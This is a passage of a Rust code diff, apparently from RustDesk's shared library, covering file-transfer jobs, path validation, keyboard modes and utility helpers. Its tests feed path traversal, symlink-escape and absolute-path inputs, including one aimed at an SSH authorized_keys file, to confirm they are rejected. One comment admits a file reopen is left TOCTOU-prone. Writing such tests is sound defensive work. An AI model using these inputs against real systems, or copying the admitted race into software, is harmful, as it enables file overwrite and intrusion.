+        log::debug!("skip file {} in job {}", self.file_num, self.id);
+        self.data_stream.take();
+        self.set_file_confirmed(false);
+        self.set_file_is_waiting(false);
+        self.file_num += 1;
+        self.file_skipped = true;
+        true
+    }
+
+    async fn set_stream_offset(&mut self, file_num: usize, offset: u64) {
+        if let DataSource::FilePath(p) = &self.data_source {
+            let entry = &self.files[file_num];
+            let Some(path) = self.resolve_entry_path(p, &entry.name) else {
+                return;
+            };
+            let file_path = get_string(&path);
+            let download_path = format!("{}.download", &file_path);
+            let digest_path = format!("{}.digest", &file_path);
+
+            let mut f = if Path::new(&download_path).exists() && Path::new(&digest_path).exists() {
+                // If both download and digest files exist, seek (writer) to the offset
+                // NOTE: same as write path: best-effort symlink validation happened earlier,
+                // but this reopen remains TOCTOU-prone by design for now.
+                match OpenOptions::new()
+                    .create(true)
+                    .write(true)
+                    .open(&download_path)
+                    .await
+                {
+                    Ok(f) => f,
+                    Err(e) => {
+                        log::warn!("Failed to open file {}: {}", download_path, e);
+                        return;
+                    }
+                }
+            } else if Path::new(&file_path).exists() {
+                // If `file_path` exists, seek (reader) to the offset
+                match File::open(&file_path).await {
+                    Ok(f) => f,
+                    Err(e) => {
+                        log::warn!("Failed to open file {}: {}", file_path, e);
+                        return;
+                    }
+                }
+            } else {
+                log::warn!(
+                    "File {} not found, cannot seek to offset {}",
+                    file_path,
+                    offset
+                );
+                return;
+            };
+            if f.seek(std::io::SeekFrom::Start(offset)).await.is_ok() {
+                self.data_stream = Some(DataStream::FileStream(f));
+                self.transferred += offset;
+                self.finished_size += offset;
+            }
+        }
+    }
+
+    pub async fn confirm(&mut self, r: &FileTransferSendConfirmRequest) -> bool {
+        if self.file_num() != r.file_num {
+            // This branch will always be hit if:
+            // 1. `confirm()` is called in `ui_cm_interface.rs`
+            // 2. Not resuming
+            //
+            // It is ok. Because `confirm()` in `ui_cm_interface.rs` is only used for resuming.
+            log::info!("file num truncated, ignoring");
+        } else {
+            match r.union {
+                Some(file_transfer_send_confirm_request::Union::Skip(s)) => {
+                    if s {
+                        self.set_file_skipped();
+                    } else {
+                        self.set_file_confirmed(true);
+                    }
+                }
+                Some(file_transfer_send_confirm_request::Union::OffsetBlk(offset)) => {
+                    self.set_file_confirmed(true);
+                    // If offset is greater than 0, we need to seek to the offset
+                    if offset > 0 {
+                        self.set_stream_offset(r.file_num as usize, offset as u64)
+                            .await;
+                    }
+                }
+                _ => {}
+            }
+        }
+        true
+    }
+
+    #[inline]
+    pub fn gen_meta(&self) -> TransferJobMeta {
+        TransferJobMeta {
+            id: self.id,
+            remote: self.remote.to_string(),
+            to: self.data_source.to_meta(),
+            file_num: self.file_num,
+            show_hidden: self.show_hidden,
+            is_remote: self.is_remote,
+        }
+    }
+}
+
+#[inline]
+pub fn new_error<T: std::string::ToString>(id: i32, err: T, file_num: i32) -> Message {
+    let mut resp = FileResponse::new();
+    resp.set_error(FileTransferError {
+        id,
+        error: err.to_string(),
+        file_num,
+        ..Default::default()
+    });
+    let mut msg_out = Message::new();
+    msg_out.set_file_response(resp);
+    msg_out
+}
+
+#[inline]
+pub fn new_dir(id: i32, path: String, files: Vec<FileEntry>) -> Message {
+    let mut resp = FileResponse::new();
+    resp.set_dir(FileDirectory {
+        id,
+        path,
+        entries: files,
+        ..Default::default()
+    });
+    let mut msg_out = Message::new();
+    msg_out.set_file_response(resp);
+    msg_out
+}
+
+#[inline]
+pub fn new_block(block: FileTransferBlock) -> Message {
+    let mut resp = FileResponse::new();
+    resp.set_block(block);
+    let mut msg_out = Message::new();
+    msg_out.set_file_response(resp);
+    msg_out
+}
+
+#[inline]
+pub fn new_send_confirm(r: FileTransferSendConfirmRequest) -> Message {
+    let mut msg_out = Message::new();
+    let mut action = FileAction::new();
+    action.set_send_confirm(r);
+    msg_out.set_file_action(action);
+    msg_out
+}
+
+#[inline]
+pub fn new_receive(
+    id: i32,
+    path: String,
+    file_num: i32,
+    files: Vec<FileEntry>,
+    total_size: u64,
+) -> Message {
+    let mut action = FileAction::new();
+    action.set_receive(FileTransferReceiveRequest {
+        id,
+        path,
+        files,
+        file_num,
+        total_size,
+        ..Default::default()
+    });
+    let mut msg_out = Message::new();
+    msg_out.set_file_action(action);
+    msg_out
+}
+
+#[inline]
+pub fn new_send(
+    id: i32,
+    r#type: JobType,
+    path: String,
+    file_num: i32,
+    include_hidden: bool,
+) -> Message {
+    log::info!("new send: {}, id: {}", path, id);
+    let mut action = FileAction::new();
+    let t: file_transfer_send_request::FileType = r#type.into();
+    action.set_send(FileTransferSendRequest {
+        id,
+        path,
+        include_hidden,
+        file_num,
+        file_type: t.into(),
+        ..Default::default()
+    });
+    let mut msg_out = Message::new();
+    msg_out.set_file_action(action);
+    msg_out
+}
+
+#[inline]
+pub fn new_done(id: i32, file_num: i32) -> Message {
+    let mut resp = FileResponse::new();
+    resp.set_done(FileTransferDone {
+        id,
+        file_num,
+        ..Default::default()
+    });
+    let mut msg_out = Message::new();
+    msg_out.set_file_response(resp);
+    msg_out
+}
+
+#[inline]
+pub fn remove_job(id: i32, jobs: &mut Vec<TransferJob>) -> Option<TransferJob> {
+    jobs.iter()
+        .position(|x| x.id() == id)
+        .map(|index| jobs.remove(index))
+}
+
+#[inline]
+pub fn get_job(id: i32, jobs: &mut [TransferJob]) -> Option<&mut TransferJob> {
+    jobs.iter_mut().find(|x| x.id() == id)
+}
+
+#[inline]
+pub fn get_job_immutable(id: i32, jobs: &[TransferJob]) -> Option<&TransferJob> {
+    jobs.iter().find(|x| x.id() == id)
+}
+
+async fn init_jobs(jobs: &mut Vec<TransferJob>, stream: &mut crate::Stream) -> ResultType<()> {
+    for job in jobs.iter_mut() {
+        if job.is_last_job {
+            continue;
+        }
+        if let Err(err) = job.init_data_stream(stream).await {
+            stream
+                .send(&new_error(job.id(), err, job.file_num()))
+                .await?;
+        }
+    }
+    Ok(())
+}
+
+pub async fn handle_read_jobs(
+    jobs: &mut Vec<TransferJob>,
+    stream: &mut crate::Stream,
+) -> ResultType<String> {
+    init_jobs(jobs, stream).await?;
+
+    let mut job_log = Default::default();
+    let mut finished = Vec::new();
+    for job in jobs.iter_mut() {
+        if job.is_last_job {
+            continue;
+        }
+        match job.read().await {
+            Err(err) => {
+                stream
+                    .send(&new_error(job.id(), err, job.file_num()))
+                    .await?;
+            }
+            Ok(Some(block)) => {
+                stream.send(&new_block(block)).await?;
+            }
+            Ok(None) => {
+                if job.job_completed() {
+                    job_log = serialize_transfer_job(job, true, false, "");
+                    finished.push(job.id());
+                    match job.job_error() {
+                        Some(err) => {
+                            job_log = serialize_transfer_job(job, false, false, &err);
+                            stream
+                                .send(&new_error(job.id(), err, job.file_num()))
+                                .await?
+                        }
+                        None => stream.send(&new_done(job.id(), job.file_num())).await?,
+                    }
+                } else {
+                    // waiting confirmation.
+                }
+            }
+        }
+        // Break to handle jobs one by one.
+        break;
+    }
+    for id in finished {
+        let _ = remove_job(id, jobs);
+    }
+    Ok(job_log)
+}
+
+pub fn remove_all_empty_dir(path: &Path) -> ResultType<()> {
+    let fd = read_dir(path, true)?;
+    for entry in fd.entries.iter() {
+        match entry.entry_type.enum_value() {
+            Ok(FileType::Dir) => {
+                remove_all_empty_dir(&path.join(&entry.name)).ok();
+            }
+            Ok(FileType::DirLink) | Ok(FileType::FileLink) => {
+                std::fs::remove_file(path.join(&entry.name)).ok();
+            }
+            _ => {}
+        }
+    }
+    std::fs::remove_dir(path).ok();
+    Ok(())
+}
+
+#[inline]
+pub fn remove_file(file: &str) -> ResultType<()> {
+    validate_fs_path_argument(file, "file path")?;
+    std::fs::remove_file(get_path(file))?;
+    Ok(())
+}
+
+#[inline]
+pub fn create_dir(dir: &str) -> ResultType<()> {
+    validate_fs_path_argument(dir, "directory path")?;
+    std::fs::create_dir_all(get_path(dir))?;
+    Ok(())
+}
+
+#[inline]
+pub fn rename_file(path: &str, new_name: &str) -> ResultType<()> {
+    validate_fs_path_argument(path, "path")?;
+    if new_name.is_empty() {
+        bail!("new file name cannot be empty");
+    }
+    validate_file_name_no_traversal(new_name)?;
+    let path = std::path::Path::new(&path);
+    if path.exists() {
+        let dir = path
+            .parent()
+            .ok_or(anyhow!("Parent directoy of {path:?} not exists"))?;
+        let new_path = dir.join(&new_name);
+        std::fs::rename(&path, &new_path)?;
+        Ok(())
+    } else {
+        bail!("{path:?} not exists");
+    }
+}
+
+#[inline]
+pub fn transform_windows_path(entries: &mut Vec<FileEntry>) {
+    for entry in entries {
+        entry.name = entry.name.replace('\\', "/");
+    }
+}
+
+pub enum DigestCheckResult {
+    IsSame,
+    NeedConfirm(FileTransferDigest),
+    NoSuchFile,
+}
+
+#[inline]
+pub fn is_write_need_confirmation(
+    is_resume: bool,
+    file_path: &str,
+    digest: &FileTransferDigest,
+) -> ResultType<DigestCheckResult> {
+    let path = Path::new(file_path);
+    let digest_file = format!("{}.digest", file_path);
+    let download_file = format!("{}.download", file_path);
+    if is_resume && Path::new(&digest_file).exists() && Path::new(&download_file).exists() {
+        // If the digest file exists, it means the file was transferred before.
+        // We can use the digest file to check whether the file is the same.
+        if let Ok(content) = std::fs::read_to_string(digest_file) {
+            if let Ok(local_digest) = serde_json::from_str::<FileDigest>(&content) {
+                let is_identical = local_digest.modified == digest.last_modified
+                    && local_digest.size == digest.file_size;
+                if is_identical {
+                    if let Ok(download_metadata) = std::fs::metadata(download_file) {
+                        // Get the file size of the local file
+                        // Only send confirmation if the file is not empty.
+                        let transferred_size = download_metadata.len();
+                        if transferred_size > 0 {
+                            return Ok(DigestCheckResult::NeedConfirm(FileTransferDigest {
+                                id: digest.id,
+                                file_num: digest.file_num,
+                                last_modified: digest.last_modified,
+                                file_size: digest.file_size,
+                                is_identical,
+                                transferred_size,
+                                ..Default::default()
+                            }));
+                        }
+                    }
+                }
+            }
+        }
+    }
+
+    if path.exists() && path.is_file() {
+        let metadata = std::fs::metadata(path)?;
+        let modified_time = metadata.modified()?;
+        let remote_mt = Duration::from_secs(digest.last_modified);
+        let local_mt = modified_time.duration_since(UNIX_EPOCH)?;
+        // [Note]
+        // We decide to give the decision whether to override the existing file to users,
+        // which obey the behavior of the file manager in our system.
+        let mut is_identical = false;
+        if remote_mt == local_mt && digest.file_size == metadata.len() {
+            is_identical = true;
+        }
+        Ok(DigestCheckResult::NeedConfirm(FileTransferDigest {
+            id: digest.id,
+            file_num: digest.file_num,
+            last_modified: local_mt.as_secs(),
+            file_size: metadata.len(),
+            is_identical,
+            ..Default::default()
+        }))
+    } else {
+        // If the file does not exist, or the digest file and download file do not exist, we return NoSuchFile.
+        Ok(DigestCheckResult::NoSuchFile)
+    }
+}
+
+pub fn serialize_transfer_jobs(jobs: &[TransferJob]) -> String {
+    let mut v = vec![];
+    for job in jobs {
+        let value = serde_json::to_value(job).unwrap_or_default();
+        v.push(value);
+    }
+    serde_json::to_string(&v).unwrap_or_default()
+}
+
+pub fn serialize_transfer_job(job: &TransferJob, done: bool, cancel: bool, error: &str) -> String {
+    let mut value = serde_json::to_value(job).unwrap_or_default();
+    value["done"] = json!(done);
+    value["cancel"] = json!(cancel);
+    value["error"] = json!(error);
+    serde_json::to_string(&value).unwrap_or_default()
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    struct TestTempDir {
+        path: PathBuf,
+    }
+
+    impl TestTempDir {
+        fn new(prefix: &str) -> Self {
+            Self {
+                path: unique_temp_dir(prefix),
+            }
+        }
+
+        fn join(&self, path: &str) -> PathBuf {
+            self.path.join(path)
+        }
+    }
+
+    impl Drop for TestTempDir {
+        fn drop(&mut self) {
+            let _ = std::fs::remove_dir_all(&self.path);
+        }
+    }
+
+    fn unique_temp_dir(prefix: &str) -> PathBuf {
+        let timestamp = SystemTime::now()
+            .duration_since(UNIX_EPOCH)
+            .unwrap_or_default()
+            .as_nanos();
+        std::env::temp_dir().join(format!("{}_{}_{}", prefix, std::process::id(), timestamp))
+    }
+
+    fn new_file_entry(name: &str) -> FileEntry {
+        let mut entry = FileEntry::new();
+        entry.name = name.to_string();
+        entry
+    }
+
+    fn new_validation_job(id: i32) -> TransferJob {
+        TransferJob::new_write(
+            id,
+            JobType::Generic,
+            "/fake/remote".to_string(),
+            DataSource::FilePath(std::env::temp_dir().join(format!("rustdesk_validation_{id}"))),
+            0,
+            false,
+            true,
+            false,
+        )
+    }
+
+    fn new_write_job(id: i32, download_dir: PathBuf, name: &str) -> ResultType<TransferJob> {
+        let job = TransferJob::new_write(
+            id,
+            JobType::Generic,
+            "/fake/remote".to_string(),
+            DataSource::FilePath(download_dir),
+            0,
+            false,
+            true,
+            false,
+        )
+        .with_files(vec![new_file_entry(name)])?;
+        Ok(job)
+    }
+
+    fn assert_err_contains(err: anyhow::Error, expected: &str) {
+        assert!(
+            err.to_string().contains(expected),
+            "expected error containing '{}', got: {}",
+            expected,
+            err
+        );
+    }
+
+    #[test]
+    fn path_traversal_e2e_write_rejects_relative_escape() {
+        let tmp_root = TestTempDir::new("rustdesk_e2e_relative");
+        let downloads = tmp_root.join("downloads");
+        std::fs::create_dir_all(&downloads).expect("create downloads dir");
+
+        let err = new_write_job(1, downloads, "../traversal_proof.txt")
+            .expect_err("relative path traversal must be rejected");
+        assert_err_contains(err, "path traversal");
+        assert!(!tmp_root.join("traversal_proof.txt").exists());
+    }
+
+    #[test]
+    fn path_traversal_e2e_write_rejects_absolute_path() {
+        let tmp_root = TestTempDir::new("rustdesk_e2e_absolute");
+        let downloads = tmp_root.join("downloads");
+        let absolute_target = tmp_root.join("fake_ssh").join("authorized_keys");
+        std::fs::create_dir_all(&downloads).expect("create downloads dir");
+
+        let err = new_write_job(2, downloads, &absolute_target.to_string_lossy())
+            .expect_err("absolute path must be rejected");
+        assert_err_contains(err, "absolute path");
+        assert!(!absolute_target.exists());
+    }
+
+    #[test]
+    #[cfg_attr(windows, ignore = "requires symlink privilege to create test symlink")]
+    fn path_traversal_e2e_write_rejects_symlink_escape() {
+        let tmp_root = TestTempDir::new("rustdesk_e2e_symlink");
+        let downloads = tmp_root.join("downloads");
+        let outside = tmp_root.join("outside");
+        let escaped_target = outside.join("escape.txt");
+        std::fs::create_dir_all(&downloads).expect("create downloads dir");
+        std::fs::create_dir_all(&outside).expect("create outside dir");
+
+        let symlink_path = downloads.join("link");
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::symlink;
+            symlink(&outside, &symlink_path).expect("create symlink for test");
+        }
+        #[cfg(windows)]
+        {
+            use std::os::windows::fs::symlink_dir;
+            symlink_dir(&outside, &symlink_path).expect("create directory symlink for test");
+        }
+
+        let err = new_write_job(3, downloads, "link/escape.txt")
+            .expect_err("symlink traversal must be rejected");
+        assert_err_contains(err, "symlink");
+        assert!(!escaped_target.exists());
+    }
+
+    #[test]
+    fn set_files_allows_single_empty_name_for_single_file_transfer() {
+        let mut job = new_validation_job(101);
+        assert!(job.set_files(vec![new_file_entry("")]).is_ok());
+    }
+
+    #[test]
+    fn set_files_rejects_empty_name_in_multi_file_transfer() {
+        let mut job = new_validation_job(102);
+        let err = job
+            .set_files(vec![new_file_entry(""), new_file_entry("ok.txt")])
+            .expect_err("empty name in multi-file transfer must be rejected");
+        assert_err_contains(err, "empty file name");
+    }
+
+    #[test]
+    fn set_files_rejects_null_byte_name() {
+        let mut job = new_validation_job(103);
+        let err = job
+            .set_files(vec![new_file_entry("bad\0name.txt")])
+            .expect_err("null byte in file name must be rejected");
+        assert_err_contains(err, "null bytes");
+    }
+
+    #[test]
+    fn set_files_rejects_mixed_entries_when_one_is_traversal() {
+        let mut job = new_validation_job(104);
+        let err = job
+            .set_files(vec![
+                new_file_entry("safe/file.txt"),
+                new_file_entry("../../escape.txt"),
+            ])
+            .expect_err("any traversal entry must reject the full file list");
+        assert_err_contains(err, "path traversal");
+    }
+
+    #[cfg(windows)]
+    #[test]
+    fn set_files_rejects_unc_absolute_path() {
+        let mut job = new_validation_job(105);
+        let err = job
+            .set_files(vec![new_file_entry("\\\\server\\share\\payload.txt")])
+            .expect_err("UNC absolute path must be rejected");
+        assert_err_contains(err, "absolute path");
+    }
+
+    #[cfg(not(windows))]
+    #[test]
+    fn set_files_allows_backslash_prefixed_name_on_unix() {
+        let mut job = new_validation_job(105);
+        assert!(job
+            .set_files(vec![new_file_entry("\\\\server\\share\\payload.txt")])
+            .is_ok());
+    }
+
+    #[test]
+    fn remove_file_rejects_empty_path() {
+        let err = remove_file("").expect_err("empty file path must be rejected");
+        assert_err_contains(err, "cannot be empty");
+    }
+
+    #[test]
+    fn remove_file_rejects_null_byte_path() {
+        let err = remove_file("bad\0path").expect_err("null byte path must be rejected");
+        assert_err_contains(err, "null bytes");
+    }
+
+    #[test]
+    fn create_dir_rejects_empty_path() {
+        let err = create_dir("").expect_err("empty directory path must be rejected");
+        assert_err_contains(err, "cannot be empty");
+    }
+
+    #[test]
+    fn create_dir_rejects_null_byte_path() {
+        let err = create_dir("bad\0path").expect_err("null byte path must be rejected");
+        assert_err_contains(err, "null bytes");
+    }
+
+    #[test]
+    fn rename_file_rejects_invalid_new_name() {
+        let tmp_root = TestTempDir::new("rustdesk_rename_invalid");
+        let src = tmp_root.join("source.txt");
+        std::fs::create_dir_all(&tmp_root.path).expect("create temp dir");
+        std::fs::write(&src, b"content").expect("create source file");
+
+        let src_str = src.to_string_lossy().to_string();
+
+        let err_empty =
+            rename_file(&src_str, "").expect_err("empty new file name must be rejected");
+        assert_err_contains(err_empty, "cannot be empty");
+
+        let err_traversal = rename_file(&src_str, "../escape.txt")
+            .expect_err("traversal new file name must be rejected");
+        assert_err_contains(err_traversal, "path traversal");
+
+        let err_null = rename_file(&src_str, "bad\0name.txt")
+            .expect_err("null byte in new file name must be rejected");
+        assert_err_contains(err_null, "null bytes");
+
+        #[cfg(windows)]
+        {
+            let err_abs = rename_file(&src_str, "C:\\Windows\\Temp\\payload.txt")
+                .expect_err("absolute new file name must be rejected");
+            assert_err_contains(err_abs, "absolute path");
+        }
+        #[cfg(not(windows))]
+        {
+            let err_abs = rename_file(&src_str, "/tmp/payload.txt")
+                .expect_err("absolute new file name must be rejected");
+            assert_err_contains(err_abs, "absolute path");
+        }
+    }
+
+    #[test]
+    fn rename_file_accepts_valid_new_name() {
+        let tmp_root = TestTempDir::new("rustdesk_rename_ok");
+        let src = tmp_root.join("rename_src.txt");
+        let dst = tmp_root.join("renamed.txt");
+        std::fs::create_dir_all(&tmp_root.path).expect("create temp dir");
+        std::fs::write(&src, b"content").expect("create source file");
+
+        let src_str = src.to_string_lossy().to_string();
+        rename_file(&src_str, "renamed.txt").expect("rename should succeed");
+
+        assert!(!src.exists());
+        assert!(dst.exists());
+    }
+
+    #[cfg(windows)]
+    #[test]
+    fn set_files_rejects_windows_drive_absolute_path() {
+        let mut job = new_validation_job(106);
+        let err = job
+            .set_files(vec![new_file_entry("C:\\Windows\\Temp\\payload.txt")])
+            .expect_err("drive-letter absolute path must be rejected");
+        assert_err_contains(err, "absolute path");
+    }
+
+    #[cfg(windows)]
+    #[test]
+    fn set_files_rejects_windows_verbatim_drive_absolute_path() {
+        let mut job = new_validation_job(1061);
+        let err = job
+            .set_files(vec![new_file_entry(r"\\?\C:\Windows\Temp\x.txt")])
+            .expect_err("verbatim drive absolute path must be rejected");
+        assert_err_contains(err, "absolute path");
+    }
+}

--- a/libs/hbb_common/src/keyboard.rs
+++ b/libs/hbb_common/src/keyboard.rs
@@ -1,0 +1,39 @@
+use std::{fmt, slice::Iter, str::FromStr};
+
+use crate::protos::message::KeyboardMode;
+
+impl fmt::Display for KeyboardMode {
+    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+        match self {
+            KeyboardMode::Legacy => write!(f, "legacy"),
+            KeyboardMode::Map => write!(f, "map"),
+            KeyboardMode::Translate => write!(f, "translate"),
+            KeyboardMode::Auto => write!(f, "auto"),
+        }
+    }
+}
+
+impl FromStr for KeyboardMode {
+    type Err = ();
+    fn from_str(s: &str) -> Result<Self, Self::Err> {
+        match s {
+            "legacy" => Ok(KeyboardMode::Legacy),
+            "map" => Ok(KeyboardMode::Map),
+            "translate" => Ok(KeyboardMode::Translate),
+            "auto" => Ok(KeyboardMode::Auto),
+            _ => Err(()),
+        }
+    }
+}
+
+impl KeyboardMode {
+    pub fn iter() -> Iter<'static, KeyboardMode> {
+        static KEYBOARD_MODES: [KeyboardMode; 4] = [
+            KeyboardMode::Legacy,
+            KeyboardMode::Map,
+            KeyboardMode::Translate,
+            KeyboardMode::Auto,
+        ];
+        KEYBOARD_MODES.iter()
+    }
+}

--- a/libs/hbb_common/src/lib.rs
+++ b/libs/hbb_common/src/lib.rs
@@ -1,0 +1,633 @@
+pub mod compress;
+pub mod platform;
+pub mod protos;
+pub use bytes;
+use config::Config;
+pub use futures;
+pub use protobuf;
+pub use protos::message as message_proto;
+pub use protos::rendezvous as rendezvous_proto;
+use serde_derive::{Deserialize, Serialize};
+use std::{
+    fs::File,
+    io::{self, BufRead},
+    net::{IpAddr, Ipv4Addr, SocketAddr, SocketAddrV4},
+    path::Path,
+    time::{self, SystemTime, UNIX_EPOCH},
+};
+pub use tokio;
+pub use tokio_util;
+pub mod proxy;
+pub mod socket_client;
+pub mod tcp;
+pub mod udp;
+pub use env_logger;
+pub use log;
+pub mod bytes_codec;
+pub use anyhow::{self, bail};
+pub use futures_util;
+pub mod config;
+pub mod fs;
+pub mod mem;
+pub use lazy_static;
+#[cfg(not(any(target_os = "android", target_os = "ios")))]
+pub use mac_address;
+pub use rand;
+pub use regex;
+pub use sodiumoxide;
+pub use tokio_socks;
+pub use tokio_socks::IntoTargetAddr;
+pub use tokio_socks::TargetAddr;
+pub mod password_security;
+pub use chrono;
+pub use directories_next;
+pub use libc;
+pub mod keyboard;
+pub use base64;
+#[cfg(not(any(target_os = "android", target_os = "ios")))]
+pub use dlopen;
+#[cfg(not(any(target_os = "android", target_os = "ios")))]
+pub use machine_uid;
+pub use serde_derive;
+pub use serde_json;
+pub use sha2;
+pub use sysinfo;
+pub use thiserror;
+pub use toml;
+pub use uuid;
+pub mod fingerprint;
+pub use flexi_logger;
+pub mod stream;
+pub mod websocket;
+#[cfg(feature = "webrtc")]
+pub mod webrtc;
+#[cfg(any(target_os = "android", target_os = "ios"))]
+pub use rustls_platform_verifier;
+pub use stream::Stream;
+pub use whoami;
+pub mod tls;
+pub mod verifier;
+pub use async_recursion;
+#[cfg(target_os = "linux")]
+pub use users;
+pub use libloading;
+#[cfg(target_os = "linux")]
+pub use x11;
+
+pub type SessionID = uuid::Uuid;
+
+#[inline]
+pub async fn sleep(sec: f32) {
+    tokio::time::sleep(time::Duration::from_secs_f32(sec)).await;
+}
+
+#[macro_export]
+macro_rules! allow_err {
+    ($e:expr) => {
+        if let Err(err) = $e {
+            log::debug!(
+                "{:?}, {}:{}:{}:{}",
+                err,
+                module_path!(),
+                file!(),
+                line!(),
+                column!()
+            );
+        } else {
+        }
+    };
+
+    ($e:expr, $($arg:tt)*) => {
+        if let Err(err) = $e {
+            log::debug!(
+                "{:?}, {}, {}:{}:{}:{}",
+                err,
+                format_args!($($arg)*),
+                module_path!(),
+                file!(),
+                line!(),
+                column!()
+            );
+        } else {
+        }
+    };
+}
+
+#[inline]
+pub fn timeout<T: std::future::Future>(ms: u64, future: T) -> tokio::time::Timeout<T> {
+    tokio::time::timeout(std::time::Duration::from_millis(ms), future)
+}
+
+pub type ResultType<F, E = anyhow::Error> = anyhow::Result<F, E>;
+
+/// Certain router and firewalls scan the packet and if they
+/// find an IP address belonging to their pool that they use to do the NAT mapping/translation, so here we mangle the ip address
+
+pub struct AddrMangle();
+
+#[inline]
+pub fn try_into_v4(addr: SocketAddr) -> SocketAddr {
+    match addr {
+        SocketAddr::V6(v6) if !addr.ip().is_loopback() => {
+            if let Some(v4) = v6.ip().to_ipv4() {
+                SocketAddr::new(IpAddr::V4(v4), addr.port())
+            } else {
+                addr
+            }
+        }
+        _ => addr,
+    }
+}
+
+impl AddrMangle {
+    pub fn encode(addr: SocketAddr) -> Vec<u8> {
+        // not work with [:1]:<port>
+        let addr = try_into_v4(addr);
+        match addr {
+            SocketAddr::V4(addr_v4) => {
+                let tm = (SystemTime::now()
+                    .duration_since(UNIX_EPOCH)
+                    .unwrap_or(std::time::Duration::ZERO)
+                    .as_micros() as u32) as u128;
+                let ip = u32::from_le_bytes(addr_v4.ip().octets()) as u128;
+                let port = addr.port() as u128;
+                let v = ((ip + tm) << 49) | (tm << 17) | (port + (tm & 0xFFFF));
+                let bytes = v.to_le_bytes();
+                let mut n_padding = 0;
+                for i in bytes.iter().rev() {
+                    if i == &0u8 {
+                        n_padding += 1;
+                    } else {
+                        break;
+                    }
+                }
+                bytes[..(16 - n_padding)].to_vec()
+            }
+            SocketAddr::V6(addr_v6) => {
+                let mut x = addr_v6.ip().octets().to_vec();
+                let port: [u8; 2] = addr_v6.port().to_le_bytes();
+                x.push(port[0]);
+                x.push(port[1]);
+                x
+            }
+        }
+    }
+
+    pub fn decode(bytes: &[u8]) -> SocketAddr {
+        use std::convert::TryInto;
+
+        if bytes.len() > 16 {
+            if bytes.len() != 18 {
+                return Config::get_any_listen_addr(false);
+            }
+            let tmp: [u8; 2] = bytes[16..].try_into().unwrap_or_default();
+            let port = u16::from_le_bytes(tmp);
+            let tmp: [u8; 16] = bytes[..16].try_into().unwrap_or_default();
+            let ip = std::net::Ipv6Addr::from(tmp);
+            return SocketAddr::new(IpAddr::V6(ip), port);
+        }
+        let mut padded = [0u8; 16];
+        padded[..bytes.len()].copy_from_slice(bytes);
+        let number = u128::from_le_bytes(padded);
+        let tm = (number >> 17) & (u32::max_value() as u128);
+        let ip = (((number >> 49) - tm) as u32).to_le_bytes();
+        let port = (number & 0xFFFFFF) - (tm & 0xFFFF);
+        SocketAddr::V4(SocketAddrV4::new(
+            Ipv4Addr::new(ip[0], ip[1], ip[2], ip[3]),
+            port as u16,
+        ))
+    }
+}
+
+pub fn get_version_from_url(url: &str) -> String {
+    let n = url.chars().count();
+    let a = url.chars().rev().position(|x| x == '-');
+    if let Some(a) = a {
+        let b = url.chars().rev().position(|x| x == '.');
+        if let Some(b) = b {
+            if a > b {
+                if url
+                    .chars()
+                    .skip(n - b)
+                    .collect::<String>()
+                    .parse::<i32>()
+                    .is_ok()
+                {
+                    return url.chars().skip(n - a).collect();
+                } else {
+                    return url.chars().skip(n - a).take(a - b - 1).collect();
+                }
+            } else {
+                return url.chars().skip(n - a).collect();
+            }
+        }
+    }
+    "".to_owned()
+}
+
+pub fn gen_version() {
+    println!("cargo:rerun-if-changed=Cargo.toml");
+    use std::io::prelude::*;
+    let mut file = File::create("./src/version.rs").unwrap();
+    for line in read_lines("Cargo.toml").unwrap().flatten() {
+        let ab: Vec<&str> = line.split('=').map(|x| x.trim()).collect();
+        if ab.len() == 2 && ab[0] == "version" {
+            file.write_all(format!("pub const VERSION: &str = {};\n", ab[1]).as_bytes())
+                .ok();
+            break;
+        }
+    }
+    // generate build date
+    let build_date = format!("{}", chrono::Local::now().format("%Y-%m-%d %H:%M"));
+    file.write_all(
+        format!("#[allow(dead_code)]\npub const BUILD_DATE: &str = \"{build_date}\";\n").as_bytes(),
+    )
+    .ok();
+    file.sync_all().ok();
+}
+
+fn read_lines<P>(filename: P) -> io::Result<io::Lines<io::BufReader<File>>>
+where
+    P: AsRef<Path>,
+{
+    let file = File::open(filename)?;
+    Ok(io::BufReader::new(file).lines())
+}
+
+pub fn is_valid_custom_id(id: &str) -> bool {
+    regex::Regex::new(r"^[a-zA-Z][\w-]{5,15}$")
+        .unwrap()
+        .is_match(id)
+}
+
+// Support 1.1.10-1, the number after - is a patch version.
+pub fn get_version_number(v: &str) -> i64 {
+    let mut versions = v.split('-');
+
+    let mut n = 0;
+
+    // The first part is the version number.
+    // 1.1.10 -> 1001100, 1.2.3 -> 1001030, multiple the last number by 10
+    // to leave space for patch version.
+    if let Some(v) = versions.next() {
+        let mut last = 0;
+        for x in v.split('.') {
+            last = x.parse::<i64>().unwrap_or(0);
+            n = n * 1000 + last;
+        }
+        n -= last;
+        n += last * 10;
+    }
+
+    if let Some(v) = versions.next() {
+        n += v.parse::<i64>().unwrap_or(0);
+    }
+
+    // Ignore the rest
+
+    n
+}
+
+pub fn get_modified_time(path: &std::path::Path) -> SystemTime {
+    std::fs::metadata(path)
+        .map(|m| m.modified().unwrap_or(UNIX_EPOCH))
+        .unwrap_or(UNIX_EPOCH)
+}
+
+pub fn get_created_time(path: &std::path::Path) -> SystemTime {
+    std::fs::metadata(path)
+        .map(|m| m.created().unwrap_or(UNIX_EPOCH))
+        .unwrap_or(UNIX_EPOCH)
+}
+
+pub fn get_exe_time() -> SystemTime {
+    std::env::current_exe().map_or(UNIX_EPOCH, |path| {
+        let m = get_modified_time(&path);
+        let c = get_created_time(&path);
+        if m > c {
+            m
+        } else {
+            c
+        }
+    })
+}
+
+/// Known cases where machine_uid::get() may fail:
+/// - Windows shutdown: "The media is write protected. (os error 19)"
+/// - macOS (hard to reproduce, reproduced at login screen): "No matching IOPlatformUUID in `ioreg -rd1 -c IOPlatformExpertDevice` command"
+pub fn get_uuid() -> Vec<u8> {
+    #[cfg(not(any(target_os = "android", target_os = "ios")))]
+    {
+        use std::sync::atomic::{AtomicUsize, Ordering};
+
+        static CACHED_MACHINE_UID: std::sync::OnceLock<Vec<u8>> = std::sync::OnceLock::new();
+        // Throttle only applies to the fallback machine_uid::get() log below, not the Once::call_once retry logs.
+        static LOG_COUNT: AtomicUsize = AtomicUsize::new(0);
+
+        // Only macOS needs retry logic here because:
+        // - macOS: in testing, only one failure occurred when reading at 50ms intervals, so retry helps
+        // - Windows: failures during shutdown are persistent, retrying is pointless
+        #[cfg(target_os = "macos")]
+        {
